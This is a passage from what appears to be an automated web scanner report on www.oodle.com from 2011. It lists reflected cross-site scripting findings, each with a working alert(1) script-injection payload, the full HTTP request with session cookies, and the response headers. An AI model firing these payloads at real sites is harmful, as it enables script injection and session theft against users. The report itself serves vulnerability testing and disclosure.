GET /info/privacy/?81bf3"-alert(1)-"455aac7a31c=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:37 GMT Content-Length: 26996 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE5Nzt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafc0"><script>alert(1)</script>d5383ccd72d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /infoaafc0"><script>alert(1)</script>d5383ccd72d/safety/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:56 GMT Content-Length: 23787 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE1Njt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d558d"-alert(1)-"27e8e8dfa9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /infod558d"-alert(1)-"27e8e8dfa9f/safety/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:58 GMT Content-Length: 23734 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE1Nzt9; path=/; domain=.oodle.com
1.30. http://www.oodle.com/info/safety/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/safety/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2b10"-alert(1)-"892d544cb59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info/safety/?f2b10"-alert(1)-"892d544cb59=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:46 GMT Content-Length: 21620 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE0Njt9; path=/; domain=.oodle.com
1.31. http://www.oodle.com/info/safety/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/safety/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b302"><script>alert(1)</script>c9ff849a7f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info/safety/?8b302"><script>alert(1)</script>c9ff849a7f4=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:44 GMT Content-Length: 21683 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE0NDt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 800d1"-alert(1)-"a35eaa46e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info800d1"-alert(1)-"a35eaa46e0/terms/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:17:17 GMT Content-Length: 23728 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDIzNzt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e8e"><script>alert(1)</script>7e382761bab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info38e8e"><script>alert(1)</script>7e382761bab/terms/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:17:17 GMT Content-Length: 23788 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDIzNjt9; path=/; domain=.oodle.com
1.34. http://www.oodle.com/info/terms/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/terms/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c8c0"-alert(1)-"eb083989c56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info/terms/?9c8c0"-alert(1)-"eb083989c56=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDIxMTt9; path=/; domain=.oodle.com Content-Length: 38252
1.35. http://www.oodle.com/info/terms/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/terms/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afc48"><script>alert(1)</script>d9d2beed9b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info/terms/?afc48"><script>alert(1)</script>d9d2beed9b3=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDIwOTt9; path=/; domain=.oodle.com Content-Length: 38327
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c00d8"-alert(1)-"4d8f3375fc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /messagec00d8"-alert(1)-"4d8f3375fc9/no-script-warning/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:22 GMT Content-Length: 23784 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyMjt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad81e"><script>alert(1)</script>7aa844c74b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /messagead81e"><script>alert(1)</script>7aa844c74b5/no-script-warning/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:20 GMT Content-Length: 23843 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyMDt9; path=/; domain=.oodle.com
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7917b"><script>alert(1)</script>1d08dd2d34d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /message/no-script-warning7917b"><script>alert(1)</script>1d08dd2d34d/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:26 GMT Content-Length: 23851 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyNjt9; path=/; domain=.oodle.com
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 690ef"-alert(1)-"98de376fdff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
